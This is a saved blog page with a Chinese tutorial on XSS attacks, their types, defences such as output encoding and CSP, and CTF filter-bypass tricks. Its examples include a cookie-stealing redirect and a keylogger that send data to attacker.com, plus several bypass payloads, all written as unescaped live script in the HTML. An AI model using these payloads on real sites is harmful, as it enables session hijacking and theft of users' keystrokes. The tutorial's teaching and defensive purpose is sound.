<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>web-XSS | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="XSS攻击概述 • 定义：XSS攻击是指攻击者通过在网页中注入恶意的JavaScript代码，这些代码会被其他用户执行，造成信息泄露、会话劫持、钓鱼攻击等安全问题。 • 目的：通过注入脚本，攻击者可以窃取用户的Cookie、会话信息、键盘输入、操作用户账户等。  XSS的分类 XSS攻击通常分为三种类型： •  存储型XSS（Stored XSS）： • 定义：攻击者将恶意脚本存储在服务器端（如">
<meta property="og:type" content="article">
<meta property="og:title" content="web-XSS">
<meta property="og:url" content="http://example.com/2025/01/19/web-XSS/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="XSS攻击概述 • 定义：XSS攻击是指攻击者通过在网页中注入恶意的JavaScript代码，这些代码会被其他用户执行，造成信息泄露、会话劫持、钓鱼攻击等安全问题。 • 目的：通过注入脚本，攻击者可以窃取用户的Cookie、会话信息、键盘输入、操作用户账户等。  XSS的分类 XSS攻击通常分为三种类型： •  存储型XSS（Stored XSS）： • 定义：攻击者将恶意脚本存储在服务器端（如">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2025/01/19/web-XSS/invalid.jpg">
<meta property="article:published_time" content="2025-01-19T14:34:14.000Z">
<meta property="article:modified_time" content="2025-01-19T14:47:02.240Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/01/19/web-XSS/invalid.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-web-XSS" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/01/19/web-XSS/" class="article-date">
  <time class="dt-published" datetime="2025-01-19T14:34:14.000Z" itemprop="datePublished">2025-01-19</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      web-XSS
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <ol>
<li>XSS攻击概述<br> • 定义：XSS攻击是指攻击者通过在网页中注入恶意的JavaScript代码，这些代码会被其他用户执行，造成信息泄露、会话劫持、钓鱼攻击等安全问题。<br> • 目的：通过注入脚本，攻击者可以窃取用户的Cookie、会话信息、键盘输入、操作用户账户等。 </li>
<li>XSS的分类 XSS攻击通常分为三种类型：<br> •  存储型XSS（Stored XSS）：<br> • 定义：攻击者将恶意脚本存储在服务器端（如数据库），当其他用户访问该页面时，恶意脚本会被执行。<br> • 攻击流程：攻击者在输入框、评论区等处提交恶意脚本，服务器存储后，其他用户访问时会执行该脚本。<br> • 危险性：存储型XSS常常对所有访问该页面的用户都有效，危害较大。<br> •  反射型XSS（Reflected XSS）：<br> • 定义：攻击者通过构造恶意链接，将脚本嵌入到URL参数中，当受害者点击链接时，恶意脚本会在服务器端反射并执行。<br> • 攻击流程：攻击者通过社会工程学诱导用户点击特制的链接，URL中的恶意代码被反射到网页中并执行。<br> • 危险性：攻击者需要诱导用户点击恶意链接才能成功攻击，因此较为依赖社交工程。<br> •  DOM-based XSS（DOM XSS）：<br> • 定义：此类XSS漏洞是由于客户端JavaScript在处理用户输入时没有做好适当的验证或清理，导致恶意脚本在客户端执行。<br> • 攻击流程：攻击者将恶意代码注入到URL中，浏览器直接在客户端执行脚本，攻击发生在前端，不依赖服务器响应。<br> • 危险性：这种攻击是完全依赖客户端的JavaScript处理方式，且可以绕过一些传统的服务器端防护措施。   </li>
<li>XSS攻击的常见利用方式<br> •  窃取Cookie或会话信息：攻击者可以通过注入脚本来窃取用户的身份验证信息（如Cookie），从而劫持用户的会话。</li>
</ol>
  <script>document.location='http://attacker.com/steal?cookie='+document.cookie;</script>
<p> •  获取用户输入：恶意脚本可以监听用户的输入并将其发送到攻击者指定的服务器。<br>  <script>document.onkeypress = function(e){ fetch(&#39;<a target="_blank" rel="noopener" href="http://attacker.com/keystrokes?key=">http://attacker.com/keystrokes?key=</a>&#39; + e.key); }</script><br> •  操控DOM：攻击者可以通过JavaScript操控网页的DOM元素，篡改网页内容或发送欺诈信息给用户。<br> •  钓鱼攻击：攻击者可以利用XSS攻击在页面中显示虚假的登录表单，诱使用户输入用户名和密码。<br>4. XSS攻击的防护措施 防止XSS攻击的核心在于确保用户输入的数据不会被直接执行为JavaScript代码。以下是一些常用的防护方法：<br> •  输入验证与过滤：<br> • 对用户输入的数据进行严格的验证和过滤。禁止一些特殊字符（如 &lt;, &gt;, “, ‘, &amp;）的直接使用<br> • 可以使用白名单过滤，确保输入只包含合法字符。<br> •  输出编码：<br> • 在将用户输入输出到HTML页面时，应使用适当的编码技术，将用户输入的特殊字符转义成HTML实体，从而防止它们被浏览器执行。<br> • 常见的转义方式包括：<br> • &amp; → &amp;<br> • &lt; → &lt;<br> • &gt; → &gt;<br> • “ → &quot;<br> • ‘ → &#x27;<br> • &#x2F; → &#x2F;<br> •  使用安全的HTTP头：<br> • Content-Security-Policy (CSP)：通过设置CSP头来限制页面的资源加载来源，防止恶意脚本的执行。<br>  Content-Security-Policy: default-src ‘self’; script-src ‘self’ <a target="_blank" rel="noopener" href="https://trusted.com/">https://trusted.com</a>;<br> •  HttpOnly和Secure Cookie标志：<br> • 对存储敏感信息（如会话cookie）时，设置HttpOnly和Secure标志，避免客户端JavaScript访问cookie。<br> • HttpOnly：防止JavaScript读取cookie。<br> • Secure：确保cookie仅在HTTPS连接中传输。<br> •  使用框架的防护功能：<br> • 现代Web开发框架（如Django、Rails、Angular、React）通常内置了防XSS功能，使用这些框架时，可以减少XSS攻击的风险。<br>5. CTF XSS题目常见技巧 在CTF竞赛中，XSS题目通常包含一些绕过防护的技巧。常见的技巧包括：<br> •  HTML注释：通过在恶意代码中加入HTML注释，绕过过滤。<br>  <script><!--<script>alert(1)</script>--></script><br> •  事件处理程序：有时可以通过注入事件处理程序（如onmouseover, onerror, onclick等）来触发XSS攻击。<br>  <img src="invalid.jpg" onerror="alert(1)"><br> •  Unicode编码：通过将JavaScript代码转换为Unicode编码，绕过某些字符过滤。<br>  <script>%u0061%u006C%u0065%u0072%u0074(1)</script><br> •  双重编码：攻击者可能通过双重URL编码、HTML实体编码等方式绕过过滤。<br>  <script>%25%73%63%72%69%70%74</script>
  </p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/01/19/web-XSS/" data-id="cm63qcedl0000wwvaf00t02vq" data-title="web-XSS" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/01/19/%E6%96%B0%E7%94%9F%E8%B5%9B-no-wakeup-1/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">新生赛]no_wakeup</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/01/">January 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/01/19/web-XSS/">web-XSS</a>
          </li>
        
          <li>
            <a href="/2025/01/19/%E6%96%B0%E7%94%9F%E8%B5%9B-no-wakeup-1/">新生赛]no_wakeup</a>
          </li>
        
          <li>
            <a href="/2025/01/15/web%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">web文件上传</a>
          </li>
        
          <li>
            <a href="/2025/01/14/wjl-first-blog/">&#39;wjl-first-blog&#39;</a>
          </li>
        
          <li>
            <a href="/2025/01/14/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>